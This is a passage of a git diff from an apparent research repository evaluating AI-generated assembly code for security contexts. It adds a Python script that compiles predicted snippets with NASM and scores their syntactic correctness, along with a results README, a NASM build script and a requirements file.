'/assembly_instruction.txt', 'w') as f: + + for z in range(len(list_snippets_spllited_by_backslash)): + f.write(list_snippets_spllited_by_backslash[z]) + f.write("\n") + + p = Path(output_dir + '/assembly_instruction.txt') + p.rename(p.with_suffix('.asm')) + + #Lancio del compilatore da shell (l'output è salvato in un file .txt temporaneo) + os.chdir(output_dir) + os.system("nasm -f bin assembly_instruction.asm 2>> temp.txt") + + #Rimozione del file .asm precedentemente creato + + #if os.path.isfile(output_dir + "/assembly_instruction.asm"): + # os.remove(output_dir + "/assembly_instruction.asm") + + #if os.path.isfile(output_dir + "/assembly_instruction"): + # os.remove(output_dir + "/assembly_instruction") + + #Verifica correttezza sintattica + + if(os.stat("temp.txt").st_size == 0): + + list_output_compiler.append("No compiler errors") + num_syntax_correct = num_syntax_correct + 1 + count_no_compiler_error = count_no_compiler_error + 1 + score.append(1) + + else : + + #Lettura del contenuto del file temporaneo e conversione in lista di output + + output_NASMcompiler = open(output_dir+"/temp.txt", 'r') + list_output_NASMcompiler = output_NASMcompiler.readlines() + output_NASMcompiler.close() + + list_output_compiler.append(''.join(list_output_NASMcompiler)) + + #Variabile booleana di controllo + error = False + warning = False + symbolNotDef = False + + #Si itera sulla lista di output + + for k in range(len(list_output_NASMcompiler)): + + #Conversione in stringa del k-esimo output e conversione in lista splittando con ' ' + + str_output_NASMcompiler = str(list_output_NASMcompiler[k]) + list_splitted_output_NASMcompiler = str_output_NASMcompiler.split(' ') + + #Si verifica che non sia una warning o un simbolo non definito. + #In caso contrario, si setta la variabile di controllo a True + + if(list_splitted_output_NASMcompiler[1] != "warning:"): + if(list_splitted_output_NASMcompiler[2] == "symbol"): + if(list_splitted_output_NASMcompiler[4] == "not"): + if(list_splitted_output_NASMcompiler[5] != "defined\n"): + error = True + else: + symbolNotDef = True + + str_symbol = list_splitted_output_NASMcompiler[3] + str_symbol = str_symbol.replace("'","") + str_symbol = str_symbol[1:] + + with open(output_dir + "/assembly_instruction.asm", "a+") as f: + f.write('\n') + f.write(str_symbol + ":") + f.close() + else: + error = True + else : + error = True + else: + warning = True + + #Verifica della presenza di errori e calcolo dei risultati + + if(symbolNotDef == True): + + if os.path.isfile(output_dir + "/temp.txt"): + os.remove(output_dir + "/temp.txt") + + os.chdir(output_dir) + os.system("nasm -f bin assembly_instruction.asm 2>> temp.txt") + + if(os.stat("temp.txt").st_size == 0): + + list_predicted_snippet_with_symbolNotDef.append(str_snippet) + list_output_compiler_with_symbolNotDef.append(''.join(list_output_NASMcompiler)) + + else: + + error = True + + output_NASMcompiler = open(output_dir+"/temp.txt", 'r') + list_output_NASMcompiler = output_NASMcompiler.readlines() + output_NASMcompiler.close() + + # if(warning == True and symbolNotDef == True): + # list_predicted_snippet_with_symbolNotDef.append(str_snippet) + # list_output_compiler_with_symbolNotDef.append(''.join(list_output_NASMcompiler)) + # warning = False + # symbolNotDef = False + + if(warning == True): + list_predicted_snippet_with_warning.append(str_snippet) + list_output_compiler_with_warning.append(''.join(list_output_NASMcompiler)) + + if(error == False): + num_syntax_correct = num_syntax_correct + 1 + score.append(1) + else: + list_predicted_snippet_with_errors.append(str_snippet) + list_output_compiler_with_errors.append(''.join(list_output_NASMcompiler)) + score.append(0) + + #Chiusura e rimozione del file temporaneo + + if os.path.isfile(output_dir + "/temp.txt"): + os.remove(output_dir + "/temp.txt") + + if os.path.isfile(output_dir + "/assembly_instruction.asm"): + os.remove(output_dir + "/assembly_instruction.asm") + + if os.path.isfile(output_dir + "/assembly_instruction"): + os.remove(output_dir + "/assembly_instruction") + + +print("\n") +print("Number of Istances: "+str(prediction.size)) +print(" - Number of predictions that match ground truth: "+str(count_matched) + " -("+str((count_matched/prediction.size)*100)+"%)") +print(" - Predictions for which there are no compilation errors: "+str(count_no_compiler_error)+ " -("+str((count_no_compiler_error/prediction.size)*100)+"%)") +print(" - Predictions with warning: "+str(len(list_predicted_snippet_with_warning)) + " -("+str((len(list_predicted_snippet_with_warning)/prediction.size)*100)+"%)") +print(" - Predictions with error 'symbol not defined': "+str(len(list_predicted_snippet_with_symbolNotDef)) + " -("+str((len(list_predicted_snippet_with_symbolNotDef)/prediction.size)*100)+"%)") +print(" - Predictions with other errors: "+str(len(list_predicted_snippet_with_errors)) + " -("+str((len(list_predicted_snippet_with_errors)/prediction.size)*100)+"%)") +print("\n") +print("Syntactic Correctness: "+ str((num_syntax_correct/prediction.size)*100)+"%") + +#Salvataggio degli snippets e degli output errati e quelli che generano warning + +nameFile = (predictions_File.name.split("/")[-1]).split(".")[0] +print("File: " + str(nameFile)) +dir_results = os.path.join(output_dir, nameFile) + +if not os.path.exists(dir_results): + os.mkdir(os.path.join(dir_results)) + +# if not os.path.exists(os.path.join(output_dir, nameFile)): +# os.mkdir(os.path.join(output_dir, nameFile)) + +df_data = {'Ground Truth Snippets' : list_ground_truth_snippet, 'Predicted Snippets' : list_predicted_snippet , 'NASM Output' : list_output_compiler, 'Score Syntax' : score} +df_snippets_compiled = pd.DataFrame(df_data) +df_snippets_compiled.to_csv(os.path.join(dir_results, "results_syntactic_analysis_"+str(nameFile)+".csv"), header=True, index=None, sep = ';') + +dir_filtered = os.path.join(dir_results, "Filtered Snipptes") + +if not os.path.exists(dir_filtered): + os.mkdir(os.path.join(dir_filtered)) + +df_data_warning = {'Predicted Snippets' : list_predicted_snippet_with_warning , 'NASM Output Warning' : list_output_compiler_with_warning} +df_snippets_compiled = pd.DataFrame(df_data_warning) +df_snippets_compiled.to_csv(os.path.join(dir_filtered, "output_syntactic_analysis_warning_"+str(nameFile)+".csv"), header=True, index=None, sep = ';') + +df_data_snt = {'Predicted Snippets' : list_predicted_snippet_with_symbolNotDef , 'NASM Output Symbol Not Defined' : list_output_compiler_with_symbolNotDef} +df_snippets_compiled = pd.DataFrame(df_data_snt) +df_snippets_compiled.to_csv(os.path.join(dir_filtered, "output_syntactic_analysis_symbolNotDefined_"+str(nameFile)+".csv"), header=True, index=None, sep = ';') + +df_data_errors = {'Predicted Snippets' : list_predicted_snippet_with_errors , 'NASM Output Errors' : list_output_compiler_with_errors} +df_snippets_compiled = pd.DataFrame(df_data_errors) +df_snippets_compiled.to_csv(os.path.join(dir_filtered, "output_syntactic_analysis_errors_"+str(nameFile)+".csv"), header=True, index=None, sep = ';') diff --git a/Experimental Results/README.md b/Experimental Results/README.md new file mode 100644 index 0000000000000000000000000000000000000000..dac62fd1c0a7d463802805821257b5a46970a21f --- /dev/null +++ b/Experimental Results/README.md @@ -0,0 +1,19 @@ +# Automating the Correctness Assessment of AI-generated Code for Security Contexts + +This folder contains the results we obtained during our empirical analysis. +To reduce the possibility of errors in the manual analysis, multiple authors discussed cases of discrepancy, obtaining a consensus for all the evaluation results. + +For each of the five AI models encompassed in our analysis, i.e., Seq2Seq, CodeBERT, CodeT5+, PLBart and ChatGPT-3.5, we report: + +- The set of natural language (NL) intents used as inputs for the AI code generation models; +- The set of ground truth code snippets, i.e., a reference implementation used for comparison; +- The set of code snippets predicted by the AI code generation models; +- The *human evaluation* score for each prediction; +- The *compilation accuracy* score for each prediction; +- The *BLEU-4* score for each prediction; +- The *SacreBLEU* score for each prediction; +- The *Edit Distance* score for each prediction; +- The *Exact Match* score for each prediction; +- The *ChatGPT-NL* score for each prediction, i.e., when ChatGPT evaluates if the generated code is the correct translation in assembly code of the NL intent; +- The *ChatGPT-GT* score for each prediction, i.e., when ChatGPT evaluates if the generated code is semantically equivalent to the ground truth code; +- The *ACCA* score for each prediction. \ No newline at end of file diff --git a/Experimental Results/Results.xlsx b/Experimental Results/Results.xlsx new file mode 100644 index 0000000000000000000000000000000000000000..5f8ab757fce7e70f667af787b6ad0cbfea66b8b8 --- /dev/null +++ b/Experimental Results/Results.xlsx @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83e4239ef2552fb336051c7324a723112571820a7bf528d9dcf83c32fa8df538 +size 320365 diff --git a/nasm_setup.sh b/nasm_setup.sh new file mode 100644 index 0000000000000000000000000000000000000000..79b60996eede5560b566251e424e2c96192e6e3b --- /dev/null +++ b/nasm_setup.sh @@ -0,0 +1,10 @@ +wget https://www.nasm.us/pub/nasm/releasebuilds/2.15.05/nasm-2.15.05.tar.bz2 +tar xfj nasm-2.15.05.tar.bz2 +cd nasm-2.15.05 +./autogen.sh +./configure --prefix=/usr/local/ +make +sudo make install +#hash -d nasm +cd .. +rm nasm-2.15.05.tar.bz2 \ No newline at end of file diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 0000000000000000000000000000000000000000..5b2508766e4aac446f7d31cdb58e824c4d8ae640 --- /dev/null +++ b/requirements.txt @@ -0,0 +1,5 @@ +pandas==1.1.5 +pathlib==1.0.1 +angr==9.2.1 +claripy==9.2.1 +tqdm==4.63.0